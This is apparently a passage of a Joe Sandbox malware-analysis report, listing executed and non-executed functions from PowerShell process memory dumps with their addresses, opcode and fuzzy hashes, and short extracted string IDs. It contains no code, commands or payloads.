                                                                  Function 04ADBAD8 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8dbaec0f74f1dca2b83a35db0e25c42000a86c66fdf4b7128b6d26fc67c262be
                                                                  • Instruction ID: 4817920fae48ed631d861b079fa1d82ca86fec9d3b8ae848134177a12b0e8e11
                                                                  • Opcode Fuzzy Hash: 8dbaec0f74f1dca2b83a35db0e25c42000a86c66fdf4b7128b6d26fc67c262be
                                                                  • Instruction Fuzzy Hash: 7C310B34B002188FCB25DB64C9556EEB7B2AF89304F1544E9D50AAB361DF36AE81CF91
                                                                  Function 04AD3975 Relevance: .1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e4d17632b523fdf221163978406ed655e36e0d5d2c2761889b77550fa3410ab6
                                                                  • Instruction ID: 42ce90a61a140ed1d50fe40e84fd3181397f481ffb4ff25ec97de27ff0e8034b
                                                                  • Opcode Fuzzy Hash: e4d17632b523fdf221163978406ed655e36e0d5d2c2761889b77550fa3410ab6
                                                                  • Instruction Fuzzy Hash: 0C316BB4A042458FCB05CF98C8909AABBF1FF49310B1585AAD849EB762C735AC41CBA1
                                                                  Function 078D0B93 Relevance: .1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a94765234aad416ecc54cd718b12952a6903b3694f886d5ea711cc4a50ccb43
                                                                  • Instruction ID: 0538386ba697e398a6587c22c3246f82a3e1521985aea5120ff3b9644d9f7740
                                                                  • Opcode Fuzzy Hash: 2a94765234aad416ecc54cd718b12952a6903b3694f886d5ea711cc4a50ccb43
                                                                  • Instruction Fuzzy Hash: 3A216BB03083457BC7244E798890B76BFA5AF92714F188466D845DB2D3DA3ADC85C371
                                                                  Function 078D09A0 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bab48b1f9df9969a52610436a7205dff9121bc6ead209406d27a6602d549d0b9
                                                                  • Instruction ID: 84849c5f8896272af0b445b8812724de0b29afe421c13d64a5c4e2c182428710
                                                                  • Opcode Fuzzy Hash: bab48b1f9df9969a52610436a7205dff9121bc6ead209406d27a6602d549d0b9
                                                                  • Instruction Fuzzy Hash: E101F77630021AABE724996ED40067AB7DBDFE1222F14C43BD985C6251DA32CC45C7A0
                                                                  Function 04ADEC03 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 54f4cf5843d80ef0ffad084f3044718f23e974e6dc8f5d7fa96638569f477a16
                                                                  • Instruction ID: 6fe15672eabbbfa3891cfa5efd1ff102b175bf460ae02b003ea5ed647bb3680c
                                                                  • Opcode Fuzzy Hash: 54f4cf5843d80ef0ffad084f3044718f23e974e6dc8f5d7fa96638569f477a16
                                                                  • Instruction Fuzzy Hash: F611F830D05948DBEF24DB98D5887EEBB71AF4531FF141429C012BA190EB7468CACBA6
                                                                  Function 04AD31E3 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 48e4fa4eee118b299cbf6ab53d8b200af52794826634be989987ac2e76057e18
                                                                  • Instruction ID: f1f8bb09aa961ff5a4b206c83d96762448b500d14a01218a1f2106ae5d055e9a
                                                                  • Opcode Fuzzy Hash: 48e4fa4eee118b299cbf6ab53d8b200af52794826634be989987ac2e76057e18
                                                                  • Instruction Fuzzy Hash: 73014F78B402199FCB04DF98D490AADF7B1FF9E300B248659D95AAB361CA35EC03CB50
                                                                  Function 04ADFEB7 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7ad83c441f186bd3fa7ba5391dee79066966163a1e95b12c2b7dd51111cf6d2d
                                                                  • Instruction ID: 31a61abbf7bbf38030fa02958584228733c7e2b96248840d0bc502779b7cde79
                                                                  • Opcode Fuzzy Hash: 7ad83c441f186bd3fa7ba5391dee79066966163a1e95b12c2b7dd51111cf6d2d
                                                                  • Instruction Fuzzy Hash: 20013C75A00109DFCB14CF9DD9809ADF7B2FF88324B248669E459A7655CB32EC51CB90
                                                                  Function 04AD2D5E Relevance: .0, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64632cb2dcc5d0f37e75aaef45f107bcdc2566c04bf2b0591adc8fe5d39e7860
                                                                  • Instruction ID: 6e81053ea83c47717e1a9fa341c7870aaad79a63422d670f7230c3217869caf3
                                                                  • Opcode Fuzzy Hash: 64632cb2dcc5d0f37e75aaef45f107bcdc2566c04bf2b0591adc8fe5d39e7860
                                                                  • Instruction Fuzzy Hash: 50F0D435A001099FCB15CF9CD990AEEF7B1FF88324F208199E955A72A1C732EC52CB60

                                                                  Non-executed Functions

                                                                  Function 078D1BA8 Relevance: 16.7, Strings: 13, Instructions: 489COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$84!l$84!l$tP]q$tP]q$t~pq$$]q$$]q$$]q$$]q
                                                                  • API String ID: 0-4181997561
                                                                  • Opcode ID: b8202ee9b2fcab642d64b366629bbdecef58f6ad6f520c642e8d8eb6dffb048f
                                                                  • Instruction ID: a820506e65f53f611c26ef3dbe70c990f783ce5e44706088030bf4a6b405ea97
                                                                  • Opcode Fuzzy Hash: b8202ee9b2fcab642d64b366629bbdecef58f6ad6f520c642e8d8eb6dffb048f
                                                                  • Instruction Fuzzy Hash: 0FF176B1F0020A9FCB249F68C4546AAFBE6FF99710F25846AD849CB251DF31DC41C7A2
                                                                  Function 078DC030 Relevance: 14.0, Strings: 11, Instructions: 295COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$84!l$84!l$tP]q$tP]q$$]q$$]q$$]q
                                                                  • API String ID: 0-4187099192
                                                                  • Opcode ID: 078c48e11915732ef329a99097fd6af12802447c64dc85a28bc0efb6350c2bb5
                                                                  • Instruction ID: 76a1ce7aa3e7a3fe503567d778f7d3a800eb5b3d4c664fcc7f05a439970b4833
                                                                  • Opcode Fuzzy Hash: 078c48e11915732ef329a99097fd6af12802447c64dc85a28bc0efb6350c2bb5
                                                                  • Instruction Fuzzy Hash: A4A124B1B0421ADFCB298FA8D4446AABBE6FFA6310F14C46AD855CB255DB31CC41C7B1
                                                                  Function 078D2308 Relevance: 12.8, Strings: 10, Instructions: 308COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                  • API String ID: 0-267665775
                                                                  • Opcode ID: 6649f04c6d2c201f48f40adcbda89a97c48f1c7c01a0834bcc7bb03611069a2f
                                                                  • Instruction ID: 27605d9484bedc66d346547e1938a672963eb7903f4cd952619bce2bedd8c6b9
                                                                  • Opcode Fuzzy Hash: 6649f04c6d2c201f48f40adcbda89a97c48f1c7c01a0834bcc7bb03611069a2f
                                                                  • Instruction Fuzzy Hash: DAA14AB170421A8FCB259E399960A7ABBF6FFE2310F1484B6D845CB291DE35CC45C3A1
                                                                  Function 078DE928 Relevance: 10.2, Strings: 8, Instructions: 191COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$4']q$4']q$4 l$4 l
                                                                  • API String ID: 0-4228074082
                                                                  • Opcode ID: dff1d96ee931e9ca3a4f945a96e2c57ac40070d815811c5bb31e69f76791134c
                                                                  • Instruction ID: b82954047a2d504e2a01c9f913486aeb17325c71c10e83d6e949bb0c6f8ed100
                                                                  • Opcode Fuzzy Hash: dff1d96ee931e9ca3a4f945a96e2c57ac40070d815811c5bb31e69f76791134c
                                                                  • Instruction Fuzzy Hash: 1861DFB0B0120AAFC714DF68C551A6ABBE3BF99314F148569D805AF354CB36EC41CB92
                                                                  Function 078DD304 Relevance: 10.2, Strings: 8, Instructions: 158COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$84!l$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                                                  • API String ID: 0-956481728
                                                                  • Opcode ID: 28c9906c48722feba48a14c3a168183192b9b4c3112be25a91dbefaaa1fa5153
                                                                  • Instruction ID: 2a7408948b4d7113ea1d33480cf7a14f0ac9c6610ad0c4b987810980725720c7
                                                                  • Opcode Fuzzy Hash: 28c9906c48722feba48a14c3a168183192b9b4c3112be25a91dbefaaa1fa5153
                                                                  • Instruction Fuzzy Hash: CB51C3B170420ADFDB28CE08C548BAA77B2BF55319F1884ABE805DB191C771EC84CBB1
                                                                  Function 078DD318 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$84!l$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                                                  • API String ID: 0-956481728
                                                                  • Opcode ID: 4db3a45a13ac6cc7642092d1fc412d02ccfca98f88839e8bca8a68775407faf6
                                                                  • Instruction ID: e0011dc6e0348f410ccb5d60c64b6cf38bbbab175b696938e44a1f61fe9a0241
                                                                  • Opcode Fuzzy Hash: 4db3a45a13ac6cc7642092d1fc412d02ccfca98f88839e8bca8a68775407faf6
                                                                  • Instruction Fuzzy Hash: 5951A2F170420ADFDB28CE09C548B6AB7B2BB55319F1884A7E805DB291D771ED84CBB1
                                                                  Function 078DCD74 Relevance: 8.9, Strings: 7, Instructions: 169COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$84!l$d%cq$d%cq$d%cq$tP]q$$]q
                                                                  • API String ID: 0-3662662227
                                                                  • Opcode ID: b1631ba4169a52e822429a03b0e50e6617e07708dbd4e06d4c8bda9c3e6555ea
                                                                  • Instruction ID: 293f7e68d336945d8a851340d2429926de0e0b498cd7ac0c648d0d39cc93d348
                                                                  • Opcode Fuzzy Hash: b1631ba4169a52e822429a03b0e50e6617e07708dbd4e06d4c8bda9c3e6555ea
                                                                  • Instruction Fuzzy Hash: 2B51D1F071430ADFCB258F24C490AAABBB2AF95714F1881ABD905DB691D772DC41CBB1
                                                                  Function 078DCDCF Relevance: 8.9, Strings: 7, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$84!l$d%cq$d%cq$d%cq$tP]q$$]q
                                                                  • API String ID: 0-3662662227
                                                                  • Opcode ID: dd10df0e3ecb381a5390eb0b062fa3278e1c48fd064855d617394a3e3933f90a
                                                                  • Instruction ID: 405c7c8d390a49d1b26cf243226dec665c34637ac5a361d3c0b81a90640d2d4a
                                                                  • Opcode Fuzzy Hash: dd10df0e3ecb381a5390eb0b062fa3278e1c48fd064855d617394a3e3933f90a
                                                                  • Instruction Fuzzy Hash: C05104F171020AEFCB248F15C590AAABBF2AF95714F148557D805DB691CB32DC42CBB1
                                                                  Function 078DC3C8 Relevance: 7.7, Strings: 6, Instructions: 209COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                                                  • API String ID: 0-1480752206
                                                                  • Opcode ID: 0d75c95b1031a4983ce4357e732cd47ef72936cb4d8f514d04fe7ebbfa14dfb4
                                                                  • Instruction ID: 079f11b1dadd3ad7065c380592286435c47c7eee1f7158ad4e904cd235b8d8f5
                                                                  • Opcode Fuzzy Hash: 0d75c95b1031a4983ce4357e732cd47ef72936cb4d8f514d04fe7ebbfa14dfb4
                                                                  • Instruction Fuzzy Hash: F86134B071421ADFCB188E69D4486BABBF7AF91221F24C47AD849CB251DB35DC45CBB0
                                                                  Function 078D192B Relevance: 7.6, Strings: 6, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$$]q$$]q
                                                                  • API String ID: 0-2669322367
                                                                  • Opcode ID: e47553fc5c83cbe520a5e215adde8018adca51ac2c03917ca6acb9a5ae87dabd
                                                                  • Instruction ID: fec3866c5a422c4575109d65eb5b5dd2c6da2c63df558a9f6b22338e80f26f23
                                                                  • Opcode Fuzzy Hash: e47553fc5c83cbe520a5e215adde8018adca51ac2c03917ca6acb9a5ae87dabd
                                                                  • Instruction Fuzzy Hash: 7D312571B0D3891FC72A0A2C1860165AFB79FC391472A04EBC481CF296CE288C4A83A6
                                                                  Function 078DCF16 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$84!l$d%cq$d%cq$d%cq$tP]q
                                                                  • API String ID: 0-2801321244
                                                                  • Opcode ID: 51720136057ca68948ed510f6e02bce4f77bc11270cb00d9d43819f2afa7c372
                                                                  • Instruction ID: 2a1d32334460da615b3f0093913e0d255e67436294e812a568fd7e6b1ba03ffa
                                                                  • Opcode Fuzzy Hash: 51720136057ca68948ed510f6e02bce4f77bc11270cb00d9d43819f2afa7c372
                                                                  • Instruction Fuzzy Hash: 1B3181B0B00215EFC714DF69C490EAAFBE2BF98724F148656E905AB350C672DC41CBA1
                                                                  Function 078D40C5 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                  • API String ID: 0-2353078639
                                                                  • Opcode ID: 3c478dee6b18bd19877e9682883766ab30d09b9e70ca4d23d75d2c8d375ffccc
                                                                  • Instruction ID: 8d7275033ef27686354211b95f6ead0aa8dbb1363b3c992d877a40f6f2437114
                                                                  • Opcode Fuzzy Hash: 3c478dee6b18bd19877e9682883766ab30d09b9e70ca4d23d75d2c8d375ffccc
                                                                  • Instruction Fuzzy Hash: BA3102B670429A8FDF294E689490566BBA6EBF2211B3484BBCC49CB241DA36CC51C751
                                                                  Function 078DC680 Relevance: 5.4, Strings: 4, Instructions: 412COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (o]q$(o]q$(o]q$(o]q
                                                                  • API String ID: 0-1261621458
                                                                  • Opcode ID: 09ace5b74c409b088ec73d6c24b5df9f8616fc94cb628a6d4beaed187390b9ff
                                                                  • Instruction ID: cfb1512b57b97593ee6fda174875290ce491a3bcb8c91ff28be494b064448ab7
                                                                  • Opcode Fuzzy Hash: 09ace5b74c409b088ec73d6c24b5df9f8616fc94cb628a6d4beaed187390b9ff
                                                                  • Instruction Fuzzy Hash: E6E124B1B0430ADFCB15DF68C840BAABBA2EF95314F1484AAE515CB291DB31CC45CBB1
                                                                  Function 078DE390 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$4']q$4']q
                                                                  • API String ID: 0-2190086065
                                                                  • Opcode ID: aeffa4ce18633d4b5844721920b315af994f9cb7cb908318cdbcc426a2c76d5e
                                                                  • Instruction ID: 87e811ecb273f53c3e355e2deebec3d34692dfc3c7339989978e1113eda6220a
                                                                  • Opcode Fuzzy Hash: aeffa4ce18633d4b5844721920b315af994f9cb7cb908318cdbcc426a2c76d5e
                                                                  • Instruction Fuzzy Hash: A0C1AEF4A00219DBCB24DF54C541BAEBBB2FF98704F148429D805AF754DB36AC45CB91
                                                                  Function 078D4A78 Relevance: 5.3, Strings: 4, Instructions: 278COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 84!l$84!l$tP]q$tP]q
                                                                  • API String ID: 0-2247917096
                                                                  • Opcode ID: 595c2f39d1ce09170170301dcb2dbade0fbaacb3b194a77beaba6b4a4761b0ca
                                                                  • Instruction ID: 83245cee64084352da24fc3790d5e9ce0e5e00829698a624d3a6b478e2cebf43
                                                                  • Opcode Fuzzy Hash: 595c2f39d1ce09170170301dcb2dbade0fbaacb3b194a77beaba6b4a4761b0ca
                                                                  • Instruction Fuzzy Hash: 5D914BB17002859FCB199F6DC890B7ABBE6AFD5710F18886ADD49DB351DA31DC40C3A1
                                                                  Function 078D7958 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l
                                                                  • API String ID: 0-2541482469
                                                                  • Opcode ID: 62be771513ac7460f8abf593acade95bf5a3aaffb7d706104a5c3c0a31379b41
                                                                  • Instruction ID: 268ee1e9a34f89940cc89e0b41e80bc9ff862e050eaa02911b9741313f3d34e6
                                                                  • Opcode Fuzzy Hash: 62be771513ac7460f8abf593acade95bf5a3aaffb7d706104a5c3c0a31379b41
                                                                  • Instruction Fuzzy Hash: 15718DB0A10209EFC714CF68C591AAEBBF2FF99314F149569D804AB355DB36EC41CBA1
                                                                  Function 078DE91C Relevance: 5.2, Strings: 4, Instructions: 157COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$4']q$4 l
                                                                  • API String ID: 0-3231604289
                                                                  • Opcode ID: c67da2a462c6af85c578be96585304235c2a984755bf309e20632a38bc68b1c5
                                                                  • Instruction ID: 0274d7b9962f1485e89a387f0445a7cbbf3510605b0c2173993a0e0995bb02ea
                                                                  • Opcode Fuzzy Hash: c67da2a462c6af85c578be96585304235c2a984755bf309e20632a38bc68b1c5
                                                                  • Instruction Fuzzy Hash: EE51AFB0A01206EBCB24CF58C580A6AFBF3BFA9314F148569D805AF755CB32EC41CB91
                                                                  Function 078D0E08 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                  • API String ID: 0-858218434
                                                                  • Opcode ID: 0203f2955070956d762a284c5f994102e16e4acec050e1f83bd22d6daf776900
                                                                  • Instruction ID: 81b96a9ab59bc12193d8b5ebc9c94e5fe951f2eb690a7c049237d530b4da03e1
                                                                  • Opcode Fuzzy Hash: 0203f2955070956d762a284c5f994102e16e4acec050e1f83bd22d6daf776900
                                                                  • Instruction Fuzzy Hash: 452168B131430E6BDB34597E9840B2BB7DAABE9715F24883AD949CB381DE36CC41C361
                                                                  Function 078D8860 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                  • API String ID: 0-858218434
                                                                  • Opcode ID: 7045e7bd41aaa334aba29471e62a5c87c54ac04b31c0966f9e98ce9e8d581621
                                                                  • Instruction ID: f2a7e5157c68f40415144a4ea3357d83f1c0c63f8a3f08ccbffd47d70ef186d5
                                                                  • Opcode Fuzzy Hash: 7045e7bd41aaa334aba29471e62a5c87c54ac04b31c0966f9e98ce9e8d581621
                                                                  • Instruction Fuzzy Hash: 1211AFF5A0430AEBDB349E69C94077AB7F6AFA5611F18446AC884C7205D731ED40C752